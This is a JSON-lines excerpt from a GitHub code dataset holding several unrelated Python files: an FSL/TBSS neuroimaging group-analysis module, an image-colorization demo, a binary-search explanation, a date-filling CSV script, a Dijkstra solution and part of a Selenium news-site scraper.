os.path.isfile(os.path.join(struct_dir, f + \".gz\"))]\n\n rrun(\"fslmerge -t GM_merg\" + \" \" + \" \".join(images))\n rrun(\"fslmaths GM_merg\" + \" -Tmean -thr 0.05 -bin GM_mask -odt char\")\n\n shutil.rmtree(struct_dir)\n\n def tbss_run_fa(self, subjects_list, odn, prepare=True, proc=True, postreg=\"S\", prestat_thr=0.2, cleanup=True):\n\n self.subjects_list = subjects_list\n if len(self.subjects_list) == 0:\n print(\"ERROR in tbss_run_fa, given grouplabel_or_subjlist params is neither a string nor a list\")\n return\n\n root_analysis_folder = os.path.join(self.project.tbss_dir, odn)\n\n os.makedirs(root_analysis_folder, exist_ok=True)\n os.makedirs(os.path.join(root_analysis_folder, \"design\"), exist_ok=True)\n\n # copy DTIFIT IMAGES to MAIN_ANALYSIS_FOLDER\n if prepare:\n\n print(\"copy subjects' corresponding dtifit_FA images to analysis folder\")\n for subj in self.subjects_list:\n src_img = Image(os.path.join(subj.dti_dir, subj.dti_fit_label + \"_FA\"))\n dest_img = os.path.join(root_analysis_folder, subj.dti_fit_label + \"_FA\")\n src_img.cp(dest_img)\n\n if proc:\n curr_dir = os.getcwd()\n os.chdir(root_analysis_folder)\n\n print(\"preprocessing dtifit_FA images\")\n rrun(\"tbss_1_preproc *.nii.gz\")\n print(\"co-registrating images to MNI template\")\n rrun(\"tbss_2_reg -T\")\n print(\"postreg\")\n rrun(\"tbss_3_postreg -\" + postreg)\n rrun(\"tbss_4_prestats \" + str(prestat_thr))\n\n os.chdir(curr_dir)\n\n if cleanup:\n # shutil.rmtree(os.path.join(root_analysis_folder, \"FA\"))\n shutil.rmtree(os.path.join(root_analysis_folder, \"origdata\"))\n shutil.rmtree(os.path.join(root_analysis_folder, \"design\"))\n\n return root_analysis_folder\n\n # run tbss for other modalities = [\"MD\", \"L1\", ....]\n # you first must have done run_tbss_fa\n def tbss_run_alternatives(self, subjects_list, input_folder, modalities, prepare=True, proc=True, cleanup=True):\n\n self.subjects_list = subjects_list\n if len(self.subjects_list) == 0:\n print(\"ERROR in tbss_run_alternatives, given grouplabel_or_subjlist params is neither a string nor a list\")\n return\n\n input_stats = os.path.join(input_folder, \"stats\")\n\n # copy DTIFIT IMAGES to MAIN_ANALYSIS_FOLDER\n if prepare:\n\n print(\"copy subjects' corresponding dtifit_XX images to analysis folder\")\n for subj in self.subjects_list:\n\n for mod in modalities:\n alternative_folder = os.path.join(input_folder, mod) # /group_analysis/tbss/population/MD\n os.makedirs(alternative_folder, exist_ok=True)\n\n src_img = Image(os.path.join(subj.dti_dir, subj.dti_fit_label + \"_\" + mod), must_exist=True, msg=\"GroupAnalysis.tbss_run_alternatives\")\n dest_img = os.path.join(alternative_folder, subj.dti_fit_label + \"_\" + mod)\n src_img.cp(dest_img)\n\n src_img = Image(os.path.join(alternative_folder, subj.dti_fit_label + \"_\" + mod), must_exist=True, msg=\"GroupAnalysis.tbss_run_alternatives\")\n dest_img = os.path.join(alternative_folder, subj.dti_fit_label + \"_FA\")\n src_img.mv(dest_img)\n\n Image(os.path.join(input_stats, \"mean_FA_skeleton_mask_dst\")).cp(os.path.join(input_stats, \"mean_\" + mod + \"_skeleton_mask_dst\"))\n Image(os.path.join(input_stats, \"mean_FA_skeleton_mask\")).cp(os.path.join(input_stats, \"mean_\" + mod + \"_skeleton_mask\"))\n Image(os.path.join(input_stats, \"mean_FA_skeleton\")).cp(os.path.join(input_stats, \"mean_\" + mod + \"_skeleton_mask\"))\n\n if proc:\n curr_dir = os.getcwd()\n os.chdir(input_folder)\n\n for mod in modalities:\n print(\"preprocessing dtifit_\" + mod + \" images\")\n rrun(\"tbss_non_FA \" + mod)\n\n os.chdir(curr_dir)\n\n if cleanup:\n # shutil.rmtree(os.path.join(input_folder, \"FA\")) #\n shutil.rmtree(os.path.join(input_folder, \"L1\"))\n shutil.rmtree(os.path.join(input_folder, \"L23\"))\n shutil.rmtree(os.path.join(input_folder, \"MD\"))\n\n # read a matrix file (not a classical subjects_data file) and add total ICV as last column\n # here it assumes [integer, integer, integer, integer, integer, float4]\n def add_icv_2_data_matrix(self, grouplabel_or_subjlist, input_data_file=None, sess_id=1):\n\n if not os.path.exists(input_data_file):\n print(\"ERROR in add_icv_2_data_matrix, given data_file does not exist\")\n return\n\n subjects = self.project.get_subjects_labels(grouplabel_or_subjlist)\n icvs = self.project.get_subjects_icv(grouplabel_or_subjlist, sess_id)\n\n nsubj = len(subjects)\n ndata = len(icvs)\n if nsubj != ndata:\n print(\"ERROR in create_vbm_spm_stats. number of given subjects does not correspond to data number\")\n return\n\n b = numpy.hstack((input_data_file, icvs))\n numpy.savetxt(input_data_file, b, ['%1.0f', '%1.0f', '%5.0f', '%5.0f', '%5.0f', '%2.4f'], '\\t')\n\n # read xtract's stats.csv file of each subject in the given list and create a tabbed file (ofp) with given values/tract\n # calls the subject routine\n def xtract_export_group_data(self, subjects_list, ofp, tracts=None, values=None, ifn=\"stats.csv\"):\n\n self.subjects_list = subjects_list\n if len(self.subjects_list) == 0:\n print(\"ERROR in xtract_export_group_data, given subjs params is neither a string nor a list\")\n return\n\n if tracts is None:\n tracts = self._global.dti_xtract_labels\n\n if values is None:\n values = [\"mean_FA\", \"mean_MD\"]\n\n file_str = \"subj\\t\"\n for tr in tracts:\n for v in values:\n file_str = file_str + tr + \"_\" + v + \"\\t\"\n file_str = file_str + \"\\n\"\n\n for subj in self.subjects_list:\n file_str = file_str + subj.dti.xtract_read_file(tracts, values, ifn)[0] + \"\\n\"\n\n with open(ofp, 'w', encoding='utf-8') as f:\n f.write(file_str)\n\n # endregion =================================================================================================================================================\n\n # ---------------------------------------------------\n #region MELODIC\n @staticmethod\n def group_melodic(out_dir_name, subjects_list, tr):\n\n if os.path.exists(out_dir_name):\n os.removedirs(out_dir_name)\n\n os.makedirs(out_dir_name)\n\n subjs = \"\"\n bgimages = \"\"\n masks = \"\"\n missing_data = \"\"\n\n for subj in subjects_list:\n\n if subj.rs_final_regstd_image.exist and subj.rs_final_regstd_bgimage.exist and subj.rs_final_regstd_bgimage.exist:\n subjs = subjs + \" \" + subj.rs_final_regstd_image\n bgimages = subjs + \" \" + subj.rs_final_regstd_bgimage\n masks = masks + \" \" + subj.rs_final_regstd_mask\n else:\n missing_data = missing_data + subj.label + \" \"\n\n if len(missing_data) > 0:\n print(\"group melodic failed. the following subjects does not have all the needed images:\")\n print(missing_data)\n return\n\n print(\"creating merged background image\")\n\n rrun(\"fslmerge -t \" + os.path.join(out_dir_name, \"bg_image\") + \" \" + bgimages)\n\n # echo \"merging background image\"\n # $FSLDIR/bin/fslmerge -t $OUTPUT_DIR/bg_image $bglist\n # $FSLDIR/bin/fslmaths $OUTPUT_DIR/bg_image -inm 1000 -Tmean $OUTPUT_DIR/bg_image -odt float\n # echo \"merging mask image\"\n # $FSLDIR/bin/fslmerge -t $OUTPUT_DIR/mask $masklist\n #\n # echo \"start group melodic !!\"\n # $FSLDIR/bin/melodic -i $filelist -o $OUTPUT_DIR -v --nobet --bgthreshold=10 --tr=$TR_VALUE --report --guireport=$OUTPUT_DIR/report.html --bgimage=$OUTPUT_DIR/bg_image -d 0 --mmthresh=0.5 --Ostats -a concat\n #\n # echo \"creating template description file\"\n # template_file=$GLOBAL_SCRIPT_DIR/melodic_templates/$template_name.sh\n #\n # echo \"template_name=$template_name\" > $template_file\n # echo \"TEMPLATE_MELODIC_IC=$OUTPUT_DIR/melodic_IC.nii.gz\" >> $template_file\n # echo \"TEMPLATE_MASK_IMAGE=$OUTPUT_DIR/mask.nii.gz\" >> $template_file\n # echo \"TEMPLATE_BG_IMAGE=$OUTPUT_DIR/bg_image.nii.gz\" >> $template_file\n # echo \"TEMPLATE_STATS_FOLDER=$OUTPUT_DIR/stats\" >> $template_file\n # echo \"TEMPLATE_MASK_FOLDER=$OUTPUT_DIR/stats\" >> $template_file\n # echo \"str_pruning_ic_id=() # valid RSN: you must set their id values removing 1: if in the html is the 6th RSN, you must write 5!!!!!!\" >> $template_file\n # echo \"str_arr_IC_labels=()\" >> $template_file\n # echo \"declare -a arr_IC_labels=()\" >> $template_file\n # echo \"declare -a arr_pruning_ic_id=()\" >> $template_file\n #\n pass\n\n #endregion\n\n # ---------------------------------------------------\n #region SBFC\n @staticmethod\n def group_sbfc(grouplabel_or_subjlist, firstlvl_fn, regressors, input_fsf, odp, ofn=\"mult_cov\", data_file=None,\n create_model=True, group_mean_contrasts=1, cov_mean_contrasts=2, compare_covs=False, ofn_postfix=\"\"):\n pass\n\n #endregion\n\n # ====================================================================================================================================================\n #region TBSS\n # ====================================================================================================================================================\n # run tbss for FA\n # uses the union between template FA_skeleton and xtract's main tracts to clusterize a tbss output\n def tbss_clusterize_results_by_atlas(self, tbss_result_image, out_folder, log_file=\"overlap.txt\", tracts_labels=None, tracts_dir=None, thr=0.95):\n\n try:\n if tracts_labels is None:\n tracts_labels = self._global.dti_xtract_labels\n\n if tracts_dir is None:\n tracts_dir = self._global.dti_xtract_dir\n\n log = os.path.join(out_folder, log_file)\n tot_voxels = 0\n classified_tracts = []\n os.makedirs(out_folder, exist_ok=True)\n\n # ----------------------------------------------------------------------------------------------------------\n # threshold tbss input, copy to out_folder, get number of voxels\n name = os.path.basename(tbss_result_image)\n thr_input = Image(os.path.join(out_folder, name))\n rrun(\"fslmaths \" + tbss_result_image + \" -thr \" + str(thr) + \" -bin \" + thr_input)\n original_voxels = thr_input.get_nvoxels()\n\n out_str = \"\"\n for tract in tracts_labels:\n tr_img = Image(os.path.join(tracts_dir, \"FMRIB58_FA-skeleton_1mm_\" + tract + \"_mask\"))\n tract_tot_voxels = tr_img.get_nvoxels()\n out_img = Image(os.path.join(out_folder, \"sk_\" + tract))\n rrun(\"fslmaths \" + thr_input + \" -mas \" + tr_img + \" \" + out_img)\n\n res = out_img.get_nvoxels()\n if res > 0:\n classified_tracts.append(out_img)\n else:\n out_img.rm()\n\n tot_voxels = tot_voxels + res\n out_str = out_str + tract + \"\\t\" + str(res) + \" out of \" + str(tract_tot_voxels) + \" voxels = \" + str(round((res * 100) / tract_tot_voxels, 2)) + \" %\" + \"\\n\"\n\n # ------------------------------------------------\n # create unclassified image\n unclass_img = Image(os.path.join(out_folder, \"unclass_\" + os.path.basename(out_folder)))\n cmd_str = \"fslmaths \" + thr_input\n for img in classified_tracts:\n cmd_str = cmd_str + \" -sub \" + img + \" -bin \"\n cmd_str = cmd_str + unclass_img\n rrun(cmd_str)\n unclass_vox = unclass_img.get_nvoxels()\n\n # ----------------------------------------------------------------------------------------------------------\n # write log file\n out_str = out_str + \"\\n\" + \"\\n\" + \"tot voxels = \" + str(tot_voxels) + \" out of \" + str(original_voxels) + \"\\n\"\n out_str = out_str + \"unclassified image has \" + str(unclass_vox)\n with open(log, 'w', encoding='utf-8') as f:\n f.write(out_str)\n\n except Exception as e:\n print(e)\n\n # clust_res_dir: output folder of tbss's results clustering\n # datas is a tuple of two elements containing a matrix of values and subj_labels\n # returns tracts_data\n @staticmethod\n def tbss_summarize_clusterized_folder(in_clust_res_dir, datas, data_labels, tbss_folder, modality=\"FA\",\n subj_img_postfix=\"_FA_FA_to_target\", ofn=\"scatter_tracts_\") -> list:\n\n ndata = len(data_labels)\n whatdata = datas[0][0]\n if isinstance(whatdata, list):\n if len(whatdata) != ndata:\n print(\"ERROR in tbss_summarize_clusterized_folder: number of data columns differ from labels....exiting\")\n return\n else:\n if ndata != 1:\n print(\"ERROR in tbss_summarize_clusterized_folder: more than one labels for one column data....exiting\")\n return\n\n out_folder = os.path.join(tbss_folder, \"results\")\n ifn = get_dirname(in_clust_res_dir)\n subjects_images = os.path.join(tbss_folder, modality) # folder containing tbss subjects' folder of that modality\n\n if modality == \"FA\":\n subj_img_postfix = \"_FA_FA_to_target\"\n else:\n subj_img_postfix = \"_FA_to_target_\" + modality\n\n tracts_labels = []\n\n # compose header\n str_data = \"subj\"\n for lab in data_labels:\n str_data = str_data + \"\\t\" + lab\n\n for entry in os.scandir(in_clust_res_dir):\n if not entry.name.startswith('.') and not entry.is_dir():\n if entry.name.startswith(\"sk_\"):\n lab = Image(entry.name[3:]).fpathnoext\n tracts_labels.append(lab)\n str_data = str_data + \"\\t\" + lab\n str_data = str_data + \"\\n\"\n\n tracts_data = []\n [tracts_data.append([]) for _ in range(len(tracts_labels))]\n nsubj = len(datas[0])\n for i in range(nsubj):\n subj_label = datas[1][i]\n in_img = os.path.join(subjects_images, subj_label + \"-dti_fit\" + subj_img_postfix)\n subj_img = Image(in_img, must_exist=True, msg=\"Error in tbss_summarize_clusterized_folder, subj image (\" + in_img + \"_masked\" + \") is missing...exiting\")\n subj_img_masked = Image(subj_img + \"_masked\")\n n_tracts = 0\n str_data = str_data + subj_label\n for id,lab in enumerate(data_labels):\n str_data = str_data + \"\\t\" + str(datas[0][i][id])\n\n for entry in os.scandir(in_clust_res_dir):\n if not entry.name.startswith('.') and not entry.is_dir():\n if entry.name.startswith(\"sk_\"):\n subj_img.mask_image(entry.path, subj_img_masked)\n val = subj_img_masked.get_image_mean()\n subj_img_masked.rm()\n\n str_data = str_data + \"\\t\" + str(val)\n tracts_data[n_tracts].append(val)\n n_tracts = n_tracts + 1\n str_data = str_data + \"\\n\"\n\n res_file = os.path.join(out_folder, ofn + ifn + \"_\" + listToString(data_labels, separator='_') + \".dat\")\n\n with open(res_file, \"w\") as f:\n f.write(str_data)\n\n return [tracts_labels, tracts_data]\n\n # create a new tbss analysis folder (only stats one), filtering an existing analysis folder\n # vols2keep: 0-based list of indices to keep\n @staticmethod\n def create_analysis_folder_from_existing(src_folder, new_folder, vols2keep, modalities=None):\n\n if modalities is None:\n modalities = [\"FA\", \"MD\", \"L1\", \"L23\"]\n\n # create new folder\n new_stats_folder = os.path.join(new_folder, \"stats\")\n os.makedirs(new_stats_folder, exist_ok=True)\n\n for mod in modalities:\n orig_image = Image(os.path.join(src_folder, \"stats\", \"all_\" + mod + \"_skeletonised\"), must_exist=True, msg=\"GroupAnalysis.create_analysis_folder_from_existing\")\n dest_image = os.path.join(new_folder, \"stats\", \"all_\" + mod + \"_skeletonised\")\n\n orig_mean_image = Image(os.path.join(src_folder, \"stats\", \"mean_\" + mod + \"_skeleton_mask\"), must_exist=True, msg=\"GroupAnalysis.create_analysis_folder_from_existing\")\n dest_mean_image = os.path.join(new_folder, \"stats\", \"mean_\" + mod + \"_skeleton_mask\")\n\n orig_image.filter_volumes(vols2keep, dest_image)\n\n orig_mean_image.cp(dest_mean_image)\n\n #endregion","repo_name":"albaspazio/pyMRI","sub_path":"group/GroupAnalysis.py","file_name":"GroupAnalysis.py","file_ext":"py","file_size_in_byte":22174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1117320055","text":"\nimport numpy as np\nimport cv2\nimport scipy.misc\nfrom skimage import color\nimport torch\nfrom IPython import embed\nimport argparse\nfrom scipy.ndimage.interpolation import zoom\nimport matplotlib.pyplot as plt\n\nimport util\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--use_gpu', action='store_true', help='whether to use GPU')\n\n# model parameters\nparser.add_argument('--arch', type=str, default='siggraph', help='[siggraph] or [drn_d_22]')\nparser.add_argument('--img_path', type=str, default='./imgs/migrant_mother.jpg', help='image to process')\nparser.add_argument('--model_path', type=str, default='./weights/caffemodel_mask01_rec.pth', help='model weights')\nparser.add_argument('--hint_ab_path', type=str, default=None, help='hints saved off as [2 x Hproc x Wproc]')\nparser.add_argument('--hint_mask_path', type=str, default=None, help='hint masked saved off as [2 x Hproc x Wproc]')\nparser.add_argument('--base_path', type=str, default='./', help='base path to save and load images')\n\n# classification point\nparser.add_argument('--hw_class', type=float, default=(50,120), nargs='+', help='point to look at for predicted distribution')\n# h,w = 50, 120 # mother's face\n# h,w = 30, 45 # point in background\n\n# constants\nparser.add_argument('--l_norm', type=float, default=100., help='L normalization')\nparser.add_argument('--l_cent', type=float, default=50., help='L center')\nparser.add_argument('--ab_norm', type=float, default=110., help='ab normalization') \nparser.add_argument('--mask_cent', type=float, default=0., help='hint mask centering')\nparser.add_argument('--HW_proc', type=int, default=(270,180), nargs='+', help='dimension to process image')\nparser.add_argument('--A', type=int, default=23, help='number of bins')\nparser.add_argument('--ab_step', type=int, default=10., help='ab increments when discretizing')\n\n\nopt = parser.parse_args()\n\n# ***** COLOR INPUT POINTS *****\nH_proc, W_proc = opt.HW_proc\nif(opt.hint_ab_path is None):\n\tin_ab = np.zeros((H_proc, W_proc, 2))\nelse:\n\t# in_ab = np.load(opt.hint_ab_path).transpose((1,2,0)) # ./imgs/migrant_mother/im_ab.npy\n\tin_ab = np.load(opt.hint_ab_path)\n\nif(opt.hint_mask_path is None):\n\tin_mask = np.zeros((H_proc, W_proc, 1))\nelse:\n\t# in_mask = 1.*np.load(opt.hint_mask_path).transpose((1,2,0)) # ./imgs/migrant_mother/im_mask.npy\n\tin_mask = 1.*np.load(opt.hint_mask_path)\n\nif(opt.arch=='siggraph'):\n\timport models.siggraph\n\tcolorizer = models.siggraph.SIGGRAPHGenerator()\nelif(opt.arch=='drn_d_22'):\n\timport models.drnseg\n\tcolorizer = models.drnseg.DRNSeg(model_name='drn_d_22')\n\nbase_path = opt.base_path\nprint('Loading from [%s]'%opt.model_path)\n# embed()\na = torch.load(opt.model_path)\nkeys_colorizer = colorizer.state_dict().keys()\nkeys_load = a.keys()\nprint(len(keys_colorizer))\nprint(len(keys_load))\nprint('Non-matching keys', np.setdiff1d(keys_colorizer, keys_load), np.setdiff1d(keys_load, keys_colorizer))\nprint('**If above list is exessively long, there is probably an error**')\ncolorizer.load_state_dict(a,strict=False)\n\nif(opt.use_gpu):\n\tcolorizer.cuda()\ncolorizer.eval()\n\n# ***** LOAD IMAGE, PREPARE DATA *****\nimg_orig = cv2.imread(opt.img_path)[:,:,::-1]\n(H_orig,W_orig) = img_orig.shape[:2]\nprint('[%ix%i] Original resolution'%(H_orig, W_orig))\nprint('[%ix%i] Processed resolution'%(H_proc,W_proc))\n\n# resize to processing size, take L channel for input\nimg_rs = cv2.resize(img_orig, (W_proc, H_proc), interpolation=cv2.INTER_CUBIC)\nimg_rs_lab = color.rgb2lab(img_rs)\nimg_rs_l = img_rs_lab[:,:,[0]]\nimg_rs_l_norm = (img_rs_l-opt.l_cent)/opt.l_norm # normalized\n\n# normalize & center input ab, input mask\nin_ab_norm = in_ab/opt.ab_norm\nin_mask_norm = in_mask - opt.mask_cent\n\n# ***** RUN MODEL *****\nout_class, out_reg = colorizer.forward(util.np2tens(img_rs_l_norm,use_gpu=opt.use_gpu), \n\tutil.np2tens(in_ab_norm,use_gpu=opt.use_gpu), \n\tutil.np2tens(in_mask_norm,use_gpu=opt.use_gpu))\nout_class = out_class.data # 1 x AB x H_proc x W_proc, probability distribution at every spatial location (h,w) of possible colors\nout_reg = out_reg.data # 1 x 2 x H_proc x W_proc\n\nout_ab_norm = util.tens2np(out_reg)\nout_ab = out_ab_norm*opt.ab_norm # un-normalize\n\n# ***** CONCATENATE WITH INPUT *****\n# concatenate with L channel, convert to RGB, save\nout_lab = np.concatenate((img_rs_l,out_ab),axis=2)\nout_rgb = util.lab2rgb_clip(out_lab)\n\n# ***** COMPUTE UNCERTAINTY *****\nout_entropy = -torch.sum(out_class*torch.log(out_class),dim=1,keepdim=True)\n\n# for visualization\nin_ab_lab_flat = np.concatenate((in_mask*50, in_ab), axis=2)\n# in_ab_lab_flat = np.concatenate((in_mask, in_ab), axis=2)\nin_ab_rgb_flat = util.lab2rgb_clip(in_ab_lab_flat)\n\nin_ab_lab_img = np.concatenate((img_rs_l, in_ab), axis=2)\nin_ab_rgb_img = util.lab2rgb_clip(in_ab_lab_img)\n\n\n\nfig = plt.figure(figsize=(18,6))\nplt.subplot(1,4,1)\nplt.imshow(in_mask[:,:,0],clim=(0,1),cmap='gray')\nplt.title('Input hint mask')\nplt.axis('off')\n\nplt.subplot(1,4,2)\nplt.imshow(in_ab_rgb_flat)\nplt.title('Input hints')\nplt.axis('off')\n\nplt.subplot(1,4,3)\nplt.imshow(in_ab_rgb_img)\nplt.title('Input (grayscale + hints)')\nplt.axis('off')\n\nplt.subplot(1,4,4)\nplt.imshow(out_rgb)\nplt.title('Output')\nplt.axis('off')\ncv2.imwrite(base_path + 'colorized_output.png', out_rgb)\n\nfig.tight_layout()\n\nplt.savefig(base_path + 'tmp.png')\n\n# plt.show()\n\n\n\n\n# ***** COLOR DISTRIBUTION PREDICTION *****\n# color bins for color classification and output recommendations\nA = opt.A # the ab colormap is divided up into 23x23 color bins\nAB = A**2 # there are 23*23=529 color bins in total\nab_step = opt.ab_step # spacing between discretized color bins\nab_edge = opt.ab_norm + ab_step/2\na_range = np.arange(-opt.ab_norm, opt.ab_norm+ab_step, step=ab_step)\nbbs, aas = np.meshgrid(a_range, a_range)\n# abs_norm = abs/ab_norm # 529x2, bin centers normalized from [-1, +1]\nab_labs = np.concatenate((50+np.zeros((A,A,1)),aas[:,:,None],bbs[:,:,None]),axis=2)\nab_rgbs = util.lab2rgb_clip(ab_labs)\n\n# capture the probability distribution at a single point\nh,w = opt.hw_class\nout_class_point = out_class[0,:,h,w] # 529, probability distribution over discretized space\n\n# PLOT RESULTS\n# show queried point on original image\nfig = plt.figure(figsize=(18,6))\nplt.subplot(1,4,1)\nplt.imshow(out_entropy.cpu().numpy()[0,0,:,:],clim=(0,5),cmap='hot')\nplt.plot(w,h,'wo', markersize=14)\n# plt.colorbar()\nplt.title('Prediction Entropy (White O)')\nplt.axis('off')\n\nplt.subplot(1,4,2)\nplt.imshow(in_ab_rgb_img)\nplt.plot(w,h,'wo', markersize=14)\nplt.title('Input + Queried point (White O)')\nplt.axis('off')\n\n# plot probability distribution over ab colorspace\nplt.subplot(1,4,3)\nplt.imshow(out_class_point.cpu().reshape(A,A).numpy(), \n\textent=[-ab_edge,ab_edge,ab_edge,-ab_edge], cmap='hot')\nplt.xlabel('b')\nplt.ylabel('a')\nplt.title('Predicted distribution')\n\nplt.subplot(1,4,4)\nplt.imshow(ab_rgbs, \n\textent=[-ab_edge,ab_edge,ab_edge,-ab_edge])\nplt.xlabel('b')\nplt.ylabel('a')\nplt.title('ab colors (L=50)')\n\nfig.tight_layout()\nplt.show()\n\n","repo_name":"irisliucy/colorization-pytorch-simple-PSE","sub_path":"run_model.py","file_name":"run_model.py","file_ext":"py","file_size_in_byte":6930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21659967610","text":"# 1. Can you explain in detail what this function does? \ndef solve(a, d):\n l, r = 0, len(a)\n while l < r:\n m = (l + r) // 2\n if a[m] == d + m:\n l = m + 1\n else: r = m\n return l + d\n\n# Detailed Code Explanation\n\"\"\"\n# 1. line 1 declares function solve. solve tkaes two arguments, a, an array, and d, an integer. a = array, d = decimal\n# 2. line 2, l is initialzed to 0 and r is initialized to the length of list a\n# l and r are used to create a search range within list a \n# l startes at 0 which is the starting point of the list. r is the index that marks the end of the list, but it's one over.\n# That is last index + 1. l = left, r = right\n# 3. A while loop in started on line 3 and runs provided the leftmost index is lower than then right most index\n# this ensures that there is a valid search range to consider. If l is no longer less than r, then, there is nothing to search for\n# 4. On line 4, variable m is initialized and defined and it's used to calculate the middle index of the search range\n# That is left most + right most divided by 2. The `//` is used to ensure that m is an integer.\n# 5 / 2 returns 2.5 while 5 // 2 returns 2\n# m = middle\n# 5. Line 5 checks if the element at index 'm' of the array is equal to d + m (decimal + middle)\n# You are essentially checking if element at index m of array is the number you are searching for + the middle index number\n# The reason for this step will be clearer soon\n# 6. In line 6, if element at index m of array is equal to d + m, it means that the current element is positioned as expected in a sorted sequence\n# That means that the elemnts to the left of the middle are also correctly positioned. So we need to narrow our search to the right part of m\n# That's why l, left is shifted to one index after the middle; l = m + 1\n# 7. Line 7: If otherwise, a[m] is not equal to d + m, it means the current elements is not in the correct position\n# And elements before it (to the left) are also likely out of place\n# So, we should continue the dearch of the left side of m\n# r, right, is now brought down to m, the middle, from its top positon at the end of the list\n# The first iteration of the loop ends and the list to be search is halved\n# The loop continues, so does the halving, till l is equal to r\n# The function returns l + d, which is also same as r + d.\n# This is essentially the count of correctly positioned elements + d which accounts for any offset intoduced by the d value\n\n# The function can re-written thus for better readability\n\ndef binary_search(array, decimal):\n left = 0\n right = len(array)\n while left < right:\n mid = (left + right) // 2\n if array[mid] == decimal + mid:\n left = mid + 1\n else:\n right = mid\n return left + decimal\n\"\"\"","repo_name":"dhev-wisdom/raspberry_et_al","sub_path":"binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14375175919","text":"from datetime import timedelta, date\nimport pandas as pd\nimport numpy as np\nimport csv\n\ndef daterange(start_date, end_date):\n for n in range(int((end_date - start_date).days)):\n yield start_date + timedelta(n)\n\nimport csv\n\nwith open('data.csv', newline='') as csvfile:\n data = list(csv.reader(csvfile))\n\ndatos = []\nfor i in range(1,len(data)):\n datos.append(str(data[i][0]))\n\nstart_date = date(2018, 1, 1)\nend_date = date(2020, 9, 4)\ncont = 0\ncati=\"\"\nfor single_date in daterange(start_date, end_date):\n cati+=str(single_date.strftime(\"%Y-%m-%d\"))\n cati+=str(\",\")\n if str(single_date.strftime(\"%Y-%m-%d\")) in datos:\n cont+=1\n cati+=str(data[cont][1])\n else:\n cati+=str(\"0\")\n #cati+=\",\"+str(single_date.weekday())+\",\"\n #cati+=str(single_date.strftime(\"%m\"))\n cati+=\"\\n\"\nf= open(\"datafinal.csv\",\"w+\")\nprint(cati)\nf.write(cati)\nf.close()\n","repo_name":"pedroangelalvarez/combiche","sub_path":"corrector.py","file_name":"corrector.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18599194209","text":"import sys\nimport heapq\nN,E=map(int,sys.stdin.readline().split(\" \"))\nINF=sys.maxsize\ngraph={}\nfor i in range(1,N+1):\n graph[i]={}\nfor i in range(E):\n row,col,distance=map(int,sys.stdin.readline().split(\" \"))\n graph[row][col]=distance\n graph[col][row]=distance\n\n\nv1,v2=map(int,sys.stdin.readline().split(\" \"))\n\ndef dijikstra(graph,start):\n queue=[]\n distances={}\n for i in range(1,N+1):\n distances[i]=INF\n distances[start]=0\n heapq.heappush(queue,[distances[start],start])\n while queue:\n current_distance,current_vertex=heapq.heappop(queue)\n\n if current_distance>distances[current_vertex]:\n continue;\n\n for key,val in graph[current_vertex].items():\n distance=current_distance+val\n if distance= max_news:\n break\n\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_ntv(self, pages=1, keep_content=False):\n print(\"Scraping from NTV\")\n self.driver.get('https://www.ntvbd.com/' + \"search/google?s=\" + self.search_key)\n\n scrap_df = []\n i = 1\n while i <= pages:\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_ntv(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n next_page = self.driver.find_element(By.XPATH, \"//div[@class='gsc-cursor']\")\n next_page.find_element(By.XPATH, f\"//div[@aria-label='Page {i + 1}']\").click()\n\n except:\n print(\"End of NTV search!\")\n break\n i += 1\n sleep(1)\n\n print(\"End of NTV search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n # def scan_page_bhorerkagoj_sel(self, link, keep_content=True):\n # date_id = link.find('bhorerkagoj.com/') + len('bhorerkagoj.com/')\n # date = link[date_id:date_id + 10]\n #\n # self.driver.get(link)\n # headline = self.driver.find_element(By.XPATH, \"//h2[@class='title']\")\n # section = self.driver.find_element(By.XPATH, \"//a[@rel='category tag']\")\n # source = self.driver.find_element(By.XPATH, \"//p[@class='name']\")\n # try:\n #\n # data_dict = {\n # 'newspaper': 'bhorerkagoj',\n # 'link': link,\n # 'language': 'bn',\n # 'date': date,\n # 'section': section.text.strip() if section else '',\n # 'source': source.text.strip() if source else '',\n # 'headline': headline.text.strip()\n # }\n # if keep_content:\n # description = driver.find_element(By.XPATH, \"//div[@id='content-p']\")\n # data_dict['description'] = description.text.strip()\n # except:\n # print(\"Error in extracting information or advertisement error.\")\n # self.driver.back()\n #\n # return data_dict\n\n\n\n def search_bhorer_kagoj(self, pages=1, keep_content=False):\n print(\"Scraping from BHORER KAGOJ\")\n self.driver.get('https://www.bhorerkagoj.net' + \"?s=\" + self.search_key)\n\n scrap_df = []\n i = 1\n while i <= pages:\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='col-sm-6 col-xs-12']/a[@href]\")\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_bhorerkagoj(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n next_page = self.driver.find_element(By.XPATH, \"//a[@title='next']\")\n next_page_url = next_page.get_attribute('href')\n self.driver.get(next_page_url)\n except:\n print(\"End of Bhorerkagoj search!\")\n break\n i += 1\n\n print(\"End of Bhorerkagoj search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_prothomalo(self, pages=1, keep_content=False):\n print(\"Scraping from Prothom Alo\")\n self.driver.get('https://www.prothomalo.com/' + \"search?q=\" + self.search_key)\n\n scrap_df = []\n i = 1\n next_j = 0\n while i <= pages:\n search_links = self.driver.find_elements(By.XPATH, 